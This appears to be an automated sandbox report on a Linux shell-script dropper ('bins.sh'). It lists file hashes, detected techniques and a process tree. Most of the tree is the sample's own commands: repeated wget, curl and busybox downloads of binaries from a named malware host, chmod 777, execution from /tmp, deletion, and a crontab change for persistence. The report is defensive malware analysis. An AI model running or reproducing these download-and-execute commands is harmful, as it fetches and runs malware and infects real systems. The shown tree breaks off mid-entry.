Analysis
max time kernel: 150s
max time network: 134s
platform: debian-9_mips
resource: debian9-mipsbe-20240611-en
resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
submitted: 28-10-2024 16:13
Static task: static1
Behavioral task: behavioral1; Sample: bins.sh; Resource: ubuntu1804-amd64-20240611-en
Behavioral task: behavioral2; Sample: bins.sh; Resource: debian9-armhf-20240611-en
Behavioral task: behavioral3; Sample: bins.sh; Resource: debian9-mipsbe-20240611-en
Behavioral task: behavioral4; Sample: bins.sh; Resource: debian9-mipsel-20240226-en
General
Target: bins.sh
Size: 10KB
MD5: d41afa47fc6a06a1cfb7b25f1b6510db
SHA1: 1ef345877ccc2780055713bec262b92657b1e4a1
SHA256: 754972bec007493d2c80bb80e68340689d10e492c7747fc68b085746b799ca0a
SHA512: 5ce676421868d2fd93aaf0307d70c8f856c56a53859c0275e01f4c1fe15644ee25c18c06208b6e0a579333df7622d73b330cf65c898bb939f2f4fd773f4de320
SSDEEP: 96:YlFdLqi3SYL4L5RK/VV1oLDfVVjV/VBziTzDYmLxi2mDxTvni6iUpBYKCak8LHbN:SI6/2FO1Y0q0/cl1GC
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
pid process: 920 chmod, 942 chmod, 963 chmod, 1003 chmod, 818 chmod, 836 chmod, 881 chmod, 905 chmod, 949 chmod, 983 chmod, 747 chmod, 875 chmod, 970 chmod, 935 chmod, 976 chmod, 846 chmod, 891 chmod, 868 chmod, 738 chmod, 762 chmod, 786 chmod, 772 chmod, 859 chmod, 997 chmod, 806 chmod, 990 chmod, 956 chmod, 853 chmod
-
Executes dropped EXE 17 IoCs
Processes:
ioc pid process
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA 739 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ 748 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F 763 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw 773 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP 807 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 847 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx 869 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA 893 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ 907 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F 922 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F
/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw 936 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw
/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP 950 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP
/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q 957 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q
/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx 964 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx
/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l 977 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l
/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB 984 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB
/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 991 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6
-
Renames itself 1 IoCs
Processes:
pid process
749 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
description ioc process
File opened for modification /var/spool/cron/crontabs/tmp.I4qxGA crontab
-
Enumerates running processes
Discovers information about currently running processes on the system
-
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
pid process: 768 busybox, 917 busybox, 926 wget, 940 curl, 969 busybox, 743 wget, 766 wget, 851 curl, 858 busybox, 961 curl, 981 curl, 856 wget, 862 wget, 873 curl, 899 curl, 967 wget, 759 wget, 830 curl, 930 busybox, 794 curl, 880 busybox, 954 curl, 962 busybox, 1002 busybox, 816 busybox, 832 busybox, 844 busybox, 872 wget, 884 wget, 857 curl, 888 busybox, 974 curl, 812 wget, 813 curl, 863 curl, 715 wget, 723 curl, 746 busybox, 760 curl, 796 busybox, 867 busybox, 878 wget, 901 busybox, 911 wget, 960 wget, 783 busybox, 955 busybox, 996 busybox, 939 wget, 945 wget, 980 wget, 982 busybox, 1000 wget, 736 busybox, 1001 curl, 975 busybox, 791 wget, 929 curl, 946 curl, 968 curl, 973 wget, 744 curl, 777 wget, 852 busybox
-
Writes file to tmp directory 14 IoCs
Malware often drops required files in the /tmp directory.
Processes:
description ioc process
File opened for modification /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 busybox
File opened for modification /tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ curl
File opened for modification /tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q busybox
File opened for modification /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP busybox
File opened for modification /tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l busybox
File opened for modification /tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA curl
File opened for modification /tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F busybox
File opened for modification /tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP busybox
File opened for modification /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx busybox
File opened for modification /tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB busybox
File opened for modification /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw busybox
File opened for modification /tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx busybox
File opened for modification /tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6 busybox
File opened for modification /tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:715
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:723
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:736
-
-
/bin/chmodchmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- File and Directory Permissions Modification
PID:738
-
-
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- Executes dropped EXE
PID:739
-
-
/bin/rmrm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵PID:742
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:743
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:744
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:746
-
-
/bin/chmodchmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:748 -
/bin/shsh -c "crontab -l"3⤵PID:750
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:751
-
-
-
/bin/shsh -c "crontab -"3⤵PID:752
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:753
-
-
-
-
/bin/rmrm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵PID:755
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:759
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:760
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Writes file to tmp directory
PID:761
-
-
/bin/chmodchmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Executes dropped EXE
PID:763
-
-
/bin/rmrm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵PID:765
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
PID:766
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵PID:767
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:768
-
-
/bin/chmodchmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- Executes dropped EXE
PID:773
-
-
/bin/rmrm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵PID:776
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- System Network Configuration Discovery
PID:777
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:780
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- System Network Configuration Discovery
PID:783
-
-
/bin/chmodchmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- File and Directory Permissions Modification
PID:786
-
-
/tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:788
-
-
/bin/rmrm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:790
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- System Network Configuration Discovery
PID:791
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- System Network Configuration Discovery
PID:794
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:796
-
-
/bin/chmodchmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- File and Directory Permissions Modification
PID:806
-
-
/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- Executes dropped EXE
PID:807
-
-
/bin/rmrm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵PID:810
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
PID:812
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
PID:813
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
PID:816
-
-
/bin/chmodchmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- File and Directory Permissions Modification
PID:818
-
-
/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵PID:821
-
-
/bin/rmrm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵PID:823
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:825
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- System Network Configuration Discovery
PID:830
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- System Network Configuration Discovery
PID:832
-
-
/bin/chmodchmod 777 HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵
- File and Directory Permissions Modification
PID:836
-
-
/tmp/HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB./HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:839
-
-
/bin/rmrm HY5C9VZAbh48jJzPSSlyqIuzn2A1PB7TeB2⤵PID:840
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:842
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:843
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:844
-
-
/bin/chmodchmod 777 gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- File and Directory Permissions Modification
PID:846
-
-
/tmp/gMHch4GjkkSXguAzcfaCqm5l4xcEum07N6./gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵
- Executes dropped EXE
PID:847
-
-
/bin/rmrm gMHch4GjkkSXguAzcfaCqm5l4xcEum07N62⤵PID:849
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:850
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- System Network Configuration Discovery
PID:851
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- System Network Configuration Discovery
PID:852
-
-
/bin/chmodchmod 777 Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em./Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:854
-
-
/bin/rmrm Z5OeGz4UzdFoRp0bpvnIbJxpime4WsU7Em2⤵PID:855
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:856
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:857
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- System Network Configuration Discovery
PID:858
-
-
/bin/chmodchmod 777 hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ./hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵PID:860
-
-
/bin/rmrm hDVxKJgp0T26joiQOFIUa1agMX4wdvf2wZ2⤵PID:861
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
PID:862
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
PID:863
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:867
-
-
/bin/chmodchmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵PID:871
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:872
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:873
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵PID:874
-
-
/bin/chmodchmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵PID:876
-
-
/bin/rmrm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵PID:877
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
PID:878
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵PID:879
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
PID:880
-
-
/bin/chmodchmod 777 DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l./DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵PID:882
-
-
/bin/rmrm DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵PID:883
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:884
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵PID:886
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- File and Directory Permissions Modification
PID:891
-
-
/tmp/QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA./QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm QoytKCAQ0cz4uhjX32S7p0QdgX4xNhIKQA2⤵PID:895
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵PID:897
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:899
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- System Network Configuration Discovery
PID:901
-
-
/bin/chmodchmod 777 BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- File and Directory Permissions Modification
PID:905
-
-
/tmp/BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ./BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵
- Executes dropped EXE
PID:907
-
-
/bin/rmrm BPkR3cVjrrQqE51A3wogye3iax1ujJBIkQ2⤵PID:909
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:911
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵PID:915
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- System Network Configuration Discovery
PID:917
-
-
/bin/chmodchmod 777 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- File and Directory Permissions Modification
PID:920
-
-
/tmp/37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F./37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm 37ioBDRWlxAa1eAUA7tKu2CGSbZMId4D5F2⤵PID:924
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
PID:926
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
PID:929
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:930
-
-
/bin/chmodchmod 777 VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- File and Directory Permissions Modification
PID:935
-
-
/tmp/VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw./VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵
- Executes dropped EXE
PID:936
-
-
/bin/rmrm VrdtsdONomvSuZRzqVh86PXBLSsdj7hNCw2⤵PID:938
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- System Network Configuration Discovery
PID:939
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- System Network Configuration Discovery
PID:940
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:941
-
-
/bin/chmodchmod 777 fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵
- File and Directory Permissions Modification
PID:942
-
-
/tmp/fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO3./fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:943
-
-
/bin/rmrm fucirO9jc55YVFSsXRn0D9lPHjWxYM8eO32⤵PID:944
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- System Network Configuration Discovery
PID:945
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- System Network Configuration Discovery
PID:946
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- Writes file to tmp directory
PID:948
-
-
/bin/chmodchmod 777 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP./5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm 5JRTubTwlCb5MsYhQIBF7LutQ2KuGK3UAP2⤵PID:952
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵PID:953
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:954
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:955
-
-
/bin/chmodchmod 777 NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q./NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm NxTSfzkq80NBAZ1Q0GwQZMMKlRbDSu0U6Q2⤵PID:959
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
PID:960
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
PID:961
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:962
-
-
/bin/chmodchmod 777 XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx./XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm XRShpAHwaUtFsGm29nJnRPcANMtUxbsoMx2⤵PID:966
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:967
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:968
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- System Network Configuration Discovery
PID:969
-
-
/bin/chmodchmod 777 nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD./nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵PID:971
-
-
/bin/rmrm nT0dHeLzevvBCC3lK4lVTtURjmcaM4oTkD2⤵PID:972
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
PID:973
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/DVVTZmZnENvEGfIsx6Ke5E1fkoBYtLXW9l2⤵
- System Network Configuration Discovery
PID:974
-
